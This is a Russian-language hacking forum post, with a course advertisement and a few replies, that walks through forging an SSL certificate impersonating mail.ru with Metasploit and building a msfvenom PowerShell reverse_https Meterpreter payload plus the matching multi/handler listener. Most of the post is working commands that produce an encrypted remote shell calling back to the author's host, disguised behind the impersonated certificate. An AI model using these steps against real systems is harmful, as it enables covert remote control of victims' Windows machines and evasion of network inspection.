• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Шифруем соединение или SSL сертификат в работе.

Всем привет. Сегодня я покажу как можно с помощью подручных средств в кали линукс, создать защищенный канал между полезной нагрузкой и листенером.

На нашем форуме уже освещалась данная тематика, где Vander делал подробный обзор про замечательный инструмент Meterpreter Paranoid Mode.

Статья - Создание SSL сертификата. Meterpreter. MPM

Сегодня я покажу альтернативный способ, создания ssl соединения, только с помощью метасплойта. Мы рассмотрим:

  • создания поддельного сертификата
  • создадим полезную нагрузку PowerShell где будем использовать сертификат который сгенерировали ранее.
  • Создания и настройка листенера для работы с нашей полезной нагрузкой.
Для создания поддельного сертификата мы будем использовать модуль из метасплойта

auxiliary/gather/impersonate_ssl

Я буду генерировать сертификат mail.ru

Запускаем метасплойт пишем:

use auxiliary/gather/impersonate_ssl

set RHOST

run

1.png




По итогу как мы видим у нас создалось три файла.




2.png



Не плохой срок действия..)


3.png




Сейчас давайте создадим полезную нагрузку с нашим сгенерированным сертификатом.

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.108 LPORT=4444 PayloadUUIDTracking=true HandlerSSLCert=/root/ StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o 4444.bat


41.png



Далее создаём листенер который позволит нам принять данные с нашей полезной нагрузки для этого нам нужно добавить 2 две строчки, а именно:

set HandlerSSLCert /root/ (путь где файл сертификата)

set StagerVerifySSLCert true

полностью это будет выглядеть следующим образом.

use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.0.108
set LPORT 4444
set HandlerSSLCert /root/
set StagerVerifySSLCert true
exploit -j




Так как у меня белый IP через роутер ,листенер на картинке будет немного отличаться.


5.png


По итогу получаем заветную сессию с проверкой сертификата SSL

На этом всё, спасибо за внимание.
 
Последнее редактирование:

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
ни чем, метод распространенный, поэтому не удивительно, что им пользуются многие.. я всего лишь описал его на нашем форуме, как альтернативу создания ssl.
 
  • Нравится
Реакции: gushmazuko и n01n02h

StaxIoT

Green Team
17.05.2018
18
6
BIT
4
Спасибо больше, добавил в закладки - вечером попробуемс.. :)
 
  • Нравится
Реакции: Vertigo

hoka

One Level
02.06.2019
8
1
BIT
48
Блин че за ерунда, где я все ошбиаюсь, второй день запустить не могу
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!